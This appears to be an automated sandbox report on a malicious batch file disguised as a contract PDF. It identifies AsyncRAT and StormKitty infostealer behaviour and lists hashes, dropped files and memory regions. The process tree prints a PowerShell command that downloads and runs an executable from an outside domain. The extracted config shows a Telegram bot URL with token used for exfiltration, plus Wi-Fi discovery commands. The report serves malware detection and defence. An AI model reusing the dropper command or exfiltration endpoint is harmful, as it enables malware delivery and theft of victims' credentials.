Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    294s
  • max time network
    248s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250129-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/02/2025, 15:32

General

  • Target

    CONTRACT_AGREEMENT_PAYMENT_0037836589337_PDF.bat

  • Size

    349B

  • MD5

    512ff935108c90d1338702a7af2d56f7

  • SHA1

    fc9a789bd4811be4dffc04c9475daaad3413e546

  • SHA256

    de11223dc99c7be3dab1e860b3c582a138432cf6d234ba335a1f51bd95894579

  • SHA512

    6f8c350373e660c0546578039ccf20399ac7fe1eb4037e75124ac6dfbf2e555ffabe0550883bb3a83d7c7665d716bfc9ab379acd7baf559e747eba195da7461f

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://igorbende.online/Main/Invoice.exe

Extracted

Family

asyncrat

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot7510448331:AAHCytY6_57dVl2jrU6mtcIyGbcE2spzJjg/sendMessage?chat_id=7068400419

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Stormkitty family
  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 10 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Drops desktop.ini file(s) 8 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CONTRACT_AGREEMENT_PAYMENT_0037836589337_PDF.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5104
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://igorbende.online/Main/Invoice.exe', 'Invoice.exe')"
      2⤵
      • Blocklisted process makes network request
      • Downloads MZ/PE file
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3972
    • C:\Users\Admin\AppData\Local\Temp\Invoice.exe
      Invoice.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4544
      • C:\Users\Admin\AppData\Local\Temp\Invoice.exe
        Invoice.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:4524
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tmp0srlz4ks.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2832
          • C:\Users\Admin\AppData\Local\Temp\tmp0srlz4ks.exe
            C:\Users\Admin\AppData\Local\Temp\tmp0srlz4ks.exe
            5⤵
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1856
            • C:\Windows\SysWOW64\cmd.exe
              "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
              6⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Wi-Fi Discovery
              • Suspicious use of WriteProcessMemory
              PID:4980
              • C:\Windows\SysWOW64\chcp.com
                chcp 65001
                7⤵
                • System Location Discovery: System Language Discovery
                PID:3264
              • C:\Windows\SysWOW64\netsh.exe
                netsh wlan show profile
                7⤵
                • Event Triggered Execution: Netsh Helper DLL
                • System Location Discovery: System Language Discovery
                • System Network Configuration Discovery: Wi-Fi Discovery
                PID:1112
              • C:\Windows\SysWOW64\findstr.exe
                findstr All
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1608
            • C:\Windows\SysWOW64\cmd.exe
              "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1732
              • C:\Windows\SysWOW64\chcp.com
                chcp 65001
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2508
              • C:\Windows\SysWOW64\netsh.exe
                netsh wlan show networks mode=bssid
                7⤵
                • Event Triggered Execution: Netsh Helper DLL
                • System Location Discovery: System Language Discovery
                PID:4476

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\603aa05a87390fa928eac1ccf76aff26\Admin@KDDAMBVR_en-US\Browsers\Firefox\Bookmarks.txt

    Filesize

    105B

    MD5

    2e9d094dda5cdc3ce6519f75943a4ff4

    SHA1

    5d989b4ac8b699781681fe75ed9ef98191a5096c

    SHA256

    c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

    SHA512

    d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

  • C:\Users\Admin\AppData\Local\603aa05a87390fa928eac1ccf76aff26\Admin@KDDAMBVR_en-US\System\Process.txt

    Filesize

    4KB

    MD5

    5d3344afafc3ec084e0e647b9b5203ee

    SHA1

    5ab321a35c371fcae799d3b0cf234c572c04e1d8

    SHA256

    037807350886c19367ef7939e0f87c076e0692c7304a965543aa3ce8da31b4f8

    SHA512

    1d913d7cbd3353344d8394682ba8bc22f3dca5a351611def31058ca73b984550c4a4d18b97faa5090beea143c6736c99e78df769615ba4d120f64f45c5eb7c78

  • C:\Users\Admin\AppData\Local\Temp\Invoice.exe

    Filesize

    10.3MB

    MD5

    0edc40f6aa50ee59dfa272f87c3ba41e

    SHA1

    2d2a7fcf6488d495fb0f9112459ca267d7448821

    SHA256

    78c04a2c69215aee355f7822cfd762dca8b497d07f0891cae94d24779f07bd9c

    SHA512

    94f11063f57b4a1fd722f1b67c6a568c0fb6bf79b51c74c5967e461acb3617c8d8cf97d71b9317ff513af7af7994c19495db627c0bfc1041e7e5fc5ae682ff4e

  • C:\Users\Admin\AppData\Local\Temp\_MEI45442\VCRUNTIME140.dll

    Filesize

    117KB

    MD5

    862f820c3251e4ca6fc0ac00e4092239

    SHA1

    ef96d84b253041b090c243594f90938e9a487a9a

    SHA256

    36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

    SHA512

    2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

  • C:\Users\Admin\AppData\Local\Temp\_MEI45442\_bz2.pyd

    Filesize

    83KB

    MD5

    c17dcb7fc227601471a641ec90e6237f

    SHA1

    c93a8c2430e844f40f1d9c880aa74612409ffbb9

    SHA256

    55894b2b98d01f37b9a8cf4daf926d0161ff23c2fb31c56f9dbbac3a61932712

    SHA512

    38851cbd234a51394673a7514110eb43037b4e19d2a6fb79471cc7d01dbcf2695e70df4ba2727c69f1fed56fc7980e3ca37fddff73cc3294a2ea44facdeb0fa9

  • C:\Users\Admin\AppData\Local\Temp\_MEI45442\_cffi_backend.cp313-win_amd64.pyd

    Filesize

    175KB

    MD5

    5cba92e7c00d09a55f5cbadc8d16cd26

    SHA1

    0300c6b62cd9db98562fdd3de32096ab194da4c8

    SHA256

    0e3d149b91fc7dc3367ab94620a5e13af6e419f423b31d4800c381468cb8ad85

    SHA512

    7ab432c8774a10f04ddd061b57d07eba96481b5bb8c663c6ade500d224c6061bc15d17c74da20a7c3cec8bbf6453404d553ebab22d37d67f9b163d7a15cf1ded

  • C:\Users\Admin\AppData\Local\Temp\_MEI45442\_ctypes.pyd

    Filesize

    129KB

    MD5

    2bd5dabbb35398a506e3406bc01eba26

    SHA1

    af3ab9d8467e25367d03cb7479a3e4324917f8d0

    SHA256

    5c4c489ac052795c27af063c96bc4db5ab250144d4839050cfa9bb3836b87c32

    SHA512

    c07860d86ae0d900e44945da77e3b620005667304c0715985f06000f3d410fffb7e38e1bc84e4e6d24889d46b9dac6bf18861c95b2b09e760012edc5406b3838

  • C:\Users\Admin\AppData\Local\Temp\_MEI45442\_decimal.pyd

    Filesize

    274KB

    MD5

    ad4324e5cc794d626ffccda544a5a833

    SHA1

    ef925e000383b6cad9361430fc38264540d434a5

    SHA256

    040f361f63204b55c17a100c260c7ddfadd00866cc055fbd641b83a6747547d5

    SHA512

    0a002b79418242112600b9246da66a5c04651aecb2e245f0220b2544d7b7df67a20139f45ddf2d4e7759ce8cc3d6b4be7f98b0a221c756449eb1b6d7af602325

  • C:\Users\Admin\AppData\Local\Temp\_MEI45442\_hashlib.pyd

    Filesize

    63KB

    MD5

    422e214ca76421e794b99f99a374b077

    SHA1

    58b24448ab889948303cdefe28a7c697687b7ebc

    SHA256

    78223aef72777efc93c739f5308a3fc5de28b7d10e6975b8947552a62592772b

    SHA512

    03fcccc5a300cc029bef06c601915fa38604d955995b127b5b121cb55fb81752a8a1eec4b1b263ba12c51538080335dabaef9e2b8259b4bf02af84a680552fa0

  • C:\Users\Admin\AppData\Local\Temp\_MEI45442\_lzma.pyd

    Filesize

    155KB

    MD5

    66a9028efd1bb12047dafce391fd6198

    SHA1

    e0b61ce28ea940f1f0d5247d40abe61ae2b91293

    SHA256

    e44dea262a24df69fd9b50b08d09ae6f8b051137ce0834640c977091a6f9fca8

    SHA512

    3c2a4e2539933cbeb1d0b3c8ef14f0563675fd53b6ef487c7a5371dfe2ee1932255f91db598a61aaadacd8dc2fe2486a91f586542c52dfc054b22ad843831d1e

  • C:\Users\Admin\AppData\Local\Temp\_MEI45442\_socket.pyd

    Filesize

    82KB

    MD5

    abf998769f3cba685e90fa06e0ec8326

    SHA1

    daa66047cf22b6be608127f8824e59b30c9026bf

    SHA256

    62d0493ced6ca33e2fd8141649dd9889c23b2e9afc5fdf56edb4f888c88fb823

    SHA512

    08c6b3573c596a15accf4936533567415198a0daab5b6e9824b820fd1f078233bbc3791fde6971489e70155f7c33c1242b0b0a3a17fe2ec95b9fadae555ed483

  • C:\Users\Admin\AppData\Local\Temp\_MEI45442\base_library.zip

    Filesize

    1.3MB

    MD5

    18c3f8bf07b4764d340df1d612d28fad

    SHA1

    fc0e09078527c13597c37dbea39551f72bbe9ae8

    SHA256

    6e30043dfa5faf9c31bd8fb71778e8e0701275b620696d29ad274846676b7175

    SHA512

    135b97cd0284424a269c964ed95b06d338814e5e7b2271b065e5eabf56a8af4a213d863dd2a1e93c1425fadb1b20e6c63ffa6e8984156928be4a9a2fbbfd5e93

  • C:\Users\Admin\AppData\Local\Temp\_MEI45442\cryptography\hazmat\bindings\_rust.pyd

    Filesize

    7.9MB

    MD5

    34293b976da366d83c12d8ee05de7b03

    SHA1

    82b8eb434c26fcc3a5d9673c9b93663c0ff9bf15

    SHA256

    a2285c3f2f7e63ba8a17ab5d0a302740e6adf7e608e0707a7737c1ec3bd8cecc

    SHA512

    0807ec7515186f0a989bb667150a84ff3bebcc248625597ba0be3c6f07ad60d70cf8a3f65191436ec16042f446d4248bf92fcd02212e459405948db10f078b8e

  • C:\Users\Admin\AppData\Local\Temp\_MEI45442\libcrypto-3.dll

    Filesize

    5.0MB

    MD5

    123ad0908c76ccba4789c084f7a6b8d0

    SHA1

    86de58289c8200ed8c1fc51d5f00e38e32c1aad5

    SHA256

    4e5d5d20d6d31e72ab341c81e97b89e514326c4c861b48638243bdf0918cfa43

    SHA512

    80fae0533ba9a2f5fa7806e86f0db8b6aab32620dde33b70a3596938b529f3822856de75bddb1b06721f8556ec139d784bc0bb9c8da0d391df2c20a80d33cb04

  • C:\Users\Admin\AppData\Local\Temp\_MEI45442\libffi-8.dll

    Filesize

    38KB

    MD5

    0f8e4992ca92baaf54cc0b43aaccce21

    SHA1

    c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

    SHA256

    eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

    SHA512

    6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

  • C:\Users\Admin\AppData\Local\Temp\_MEI45442\python3.DLL

    Filesize

    70KB

    MD5

    ad2c4784c3240063eeaa646fd59be62c

    SHA1

    5efab563725781ab38a511e3f26e0406d5d46e8d

    SHA256

    c1de4bfe57dc4a5be8c72c865d617dc39dfd8162fcd2ce1fac9f401cf9efb504

    SHA512

    c964d4289206d099310bd5299f71a32c643311e0e8445e35ae3179772136d0ca9b75f5271eaf31efc75c055cd438799cef836ed87797589629b0e9f247424676

  • C:\Users\Admin\AppData\Local\Temp\_MEI45442\python313.dll

    Filesize

    5.8MB

    MD5

    3aad23292404a7038eb07ce5a6348256

    SHA1

    35cac5479699b28549ebe36c1d064bfb703f0857

    SHA256

    78b1dd211c0e66a0603df48da2c9b67a915ab3258701b9285d3faa255ed8dc25

    SHA512

    f5b6ef04e744d2c98c1ef9402d7a8ce5cda3b008837cf2c37a8b6d0cd1b188ca46585a40b2db7acf019f67e6ced59eff5bc86e1aaf48d3c3b62fecf37f3aec6b

  • C:\Users\Admin\AppData\Local\Temp\_MEI45442\select.pyd

    Filesize

    31KB

    MD5

    62fe3761d24b53d98cc9b0cbbd0feb7c

    SHA1

    317344c9edf2fcfa2b9bc248a18f6e6acedafffb

    SHA256

    81f124b01a85882e362a42e94a13c0eff2f4ccd72d461821dc5457a789554413

    SHA512

    a1d3da17937087af4e5980d908ed645d4ea1b5f3ebfab5c572417df064707cae1372b331c7096cc8e2e041db9315172806d3bc4bb425c6bb4d2fa55e00524881

  • C:\Users\Admin\AppData\Local\Temp\_MEI45442\unicodedata.pyd

    Filesize

    695KB

    MD5

    43b8b61debbc6dd93124a00ddd922d8c

    SHA1

    5dee63d250ac6233aac7e462eee65c5326224f01

    SHA256

    3f462ee6e7743a87e5791181936539642e3761c55de3de980a125f91fe21f123

    SHA512

    dd4791045cf887e6722feae4442c38e641f19ec994a8eaf7667e9df9ea84378d6d718caf3390f92443f6bbf39840c150121bb6fa896c4badd3f78f1ffe4de19d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_djljosec.rcr.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\tmp0srlz4ks.exe

    Filesize

    175KB

    MD5

    f74372c84ccbdfd0c3045668a806c39b

    SHA1

    12ea2278a106e70c2de908f4e5b7930e577a1d25

    SHA256

    52a1813227bc242f937f8b9392cb2c8fce2aa4b525598199a79905a214c40da3

    SHA512

    c33f2ebd93f53e2945e7170b6535c860e106e86dcb8e2c4f6cda000c724f3fa1f4671f912c4aff7be280c66031caa55198b0bafb6df390b92f24183e321948ca

  • C:\Users\Admin\AppData\Local\a80e78ae5b0b645bbb004ba8dc3d76b1\msgid.dat

    Filesize

    1B

    MD5

    cfcd208495d565ef66e7dff9f98764da

    SHA1

    b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

    SHA256

    5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

    SHA512

    31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

  • memory/1856-233-0x00000000056F0000-0x00000000056FA000-memory.dmp

    Filesize

    40KB

  • memory/1856-228-0x00000000055D0000-0x0000000005662000-memory.dmp

    Filesize

    584KB

  • memory/1856-229-0x0000000005C20000-0x00000000061C4000-memory.dmp

    Filesize

    5.6MB

  • memory/1856-78-0x0000000000090000-0x00000000000C2000-memory.dmp

    Filesize

    200KB

  • memory/1856-239-0x0000000005850000-0x0000000005862000-memory.dmp

    Filesize

    72KB

  • memory/1856-79-0x0000000004BC0000-0x0000000004C26000-memory.dmp

    Filesize

    408KB

  • memory/3972-11-0x00007FF8701A0000-0x00007FF870C61000-memory.dmp

    Filesize

    10.8MB

  • memory/3972-10-0x000001F1C64D0000-0x000001F1C64F2000-memory.dmp

    Filesize

    136KB

  • memory/3972-12-0x00007FF8701A0000-0x00007FF870C61000-memory.dmp

    Filesize

    10.8MB

  • memory/3972-13-0x00007FF8701A3000-0x00007FF8701A5000-memory.dmp

    Filesize

    8KB

  • memory/3972-14-0x00007FF8701A0000-0x00007FF870C61000-memory.dmp

    Filesize

    10.8MB

  • memory/3972-18-0x00007FF8701A0000-0x00007FF870C61000-memory.dmp

    Filesize

    10.8MB

  • memory/3972-0-0x00007FF8701A3000-0x00007FF8701A5000-memory.dmp

    Filesize

    8KB